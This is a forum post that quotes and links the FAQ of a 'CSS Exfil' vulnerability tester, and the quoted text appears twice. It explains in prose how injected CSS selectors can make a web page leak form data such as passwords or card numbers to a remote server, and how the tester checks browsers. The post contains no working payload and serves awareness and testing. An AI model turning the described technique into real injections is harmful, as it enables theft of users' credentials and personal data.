02-06-2018, 08:42 PM
What is this CSS vulnerability again?
The CSS Exfil vulnerability detailed in this lengthy post is a method attackers can use to steal data from web pages using Cascading Style Sheets (CSS). CSS - one of the building blocks of the modern web - is used by developers to control the look-and-feel of a website and is present on nearly every modern page on the internet. By crafting targeted CSS selectors and injecting them into a web page, an attacker can trick the page into sending pieces of data to a remote server (e.g. usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers).
How does this vulnerability tester page work?
This page attempts to load four remote images using CSS selectors which parse a hidden text field. If it is able to load any of those four images your browser is vulnerable to the CSS Exfil attack.
If the vulnerability doesn't involve JavaScript, why does the vulnerability tester require JavaScript?
While the CSS Exfil attack doesn't require JavaScript to function, this page requires a few lines of JavaScript to check to see if the exploit succeeded in loading the images.
CSS Exfil Vulnerability Tester
https://www.mike-gualtieri.com/css-exfil...ity-tester
The CSS Exfil vulnerability detailed in this lengthy post is a method attackers can use to steal data from web pages using Cascading Style Sheets (CSS). CSS - one of the building blocks of the modern web - is used by developers to control the look-and-feel of a website and is present on nearly every modern page on the internet. By crafting targeted CSS selectors and injecting them into a web page, an attacker can trick the page into sending pieces of data to a remote server (e.g. usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers).
How does this vulnerability tester page work?
This page attempts to load four remote images using CSS selectors which parse a hidden text field. If it is able to load any of those four images your browser is vulnerable to the CSS Exfil attack.
If the vulnerability doesn't involve JavaScript, why does the vulnerability tester require JavaScript?
While the CSS Exfil attack doesn't require JavaScript to function, this page requires a few lines of JavaScript to check to see if the exploit succeeded in loading the images.
CSS Exfil Vulnerability Tester
https://www.mike-gualtieri.com/css-exfil...ity-tester